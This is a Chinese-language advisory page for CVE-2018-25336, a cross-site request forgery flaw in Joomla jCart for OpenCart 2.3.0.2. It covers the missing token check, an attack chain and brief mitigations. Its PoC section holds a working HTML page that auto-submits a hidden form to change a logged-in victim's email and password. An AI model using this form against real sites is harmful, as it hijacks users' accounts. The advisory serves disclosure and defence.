CVE-2018-25336 CVSS 5.3 中危

CVE-2018-25336 Joomla jCart for OpenCart CSRF漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25336

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Joomla jCart for OpenCart

漏洞概述

Joomla jCart for OpenCart 2.3.0.2 版本存在跨站请求伪造（CSRF）漏洞。该漏洞由于缺乏有效的CSRF令牌验证机制，允许攻击者诱导已登录用户访问恶意网页。一旦用户访问，其浏览器将自动发送请求修改用户账户信息，包括凭据、密码及联盟账户详情，从而在未经授权的情况下劫持账户。

技术细节

该漏洞的核心在于 Joomla jCart for OpenCart 组件在处理敏感操作时未验证请求来源的合法性。应用程序在更新用户凭证、密码或联盟账户详情的端点处，缺失了抗 CSRF 令牌（如同步令牌模式）或严格的 Referer 检查。攻击者可以利用这一缺陷，构造包含隐藏表单的恶意 HTML 页面，表单 action 指向受害系统的修改接口。当受害者访问该页面时，浏览器会自动携带受害者的有效会话 Cookie 发送请求。由于服务器无法区分请求是由用户主动发起还是由恶意页面诱导发起，因此会执行相应的数据库更新操作。这使得攻击者能够绕过身份验证，篡改用户关键信息，进而完全控制用户账户。

攻击链分析

STEP 1

1. 构造攻击载荷

攻击者分析漏洞端点，编写包含恶意HTML表单的网页，表单字段指向修改用户凭证或联盟账户的接口，并预设恶意数据。

STEP 2

2. 诱导受害者

攻击者通过网络钓鱼、邮件或其他社会工程学手段，诱导已登录目标网站的受害者访问上述恶意网页链接。

STEP 3

3. 发起伪造请求

当受害者浏览器加载恶意页面时，解析并自动提交表单。浏览器会附带受害者的登录Session Cookie向目标服务器发送POST请求。

STEP 4

4. 执行未授权操作

目标服务器接收到请求，由于未验证CSRF Token，服务器误认为是用户的合法操作，执行修改逻辑，导致账户信息被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html> <body> <h1>Joomla jCart for OpenCart CSRF PoC</h1> <p>Page will auto-submit to change user details.</p>  <form action="http://target-site.com/index.php" method="POST"> <input type="hidden" name="option" value="com_jcart" /> <input type="hidden" name="task" value="save" />  <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="password" value="newhackedpassword" /> <input type="hidden" name="affiliate_details" value="modified_info" /> <input type="submit" value="Submit Request" /> </form> <script> // Automatically submit the form when the page loads document.forms[0].submit(); </script> </body> </html>

影响范围

Joomla jCart for OpenCart 2.3.0.2

防御指南

临时缓解措施

建议管理员暂时限制对该组件的访问权限，或检查日志是否有异常的账户修改记录。用户在登录状态下应避免点击不明链接或访问不可信的第三方网站，并在操作完成后及时退出登录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表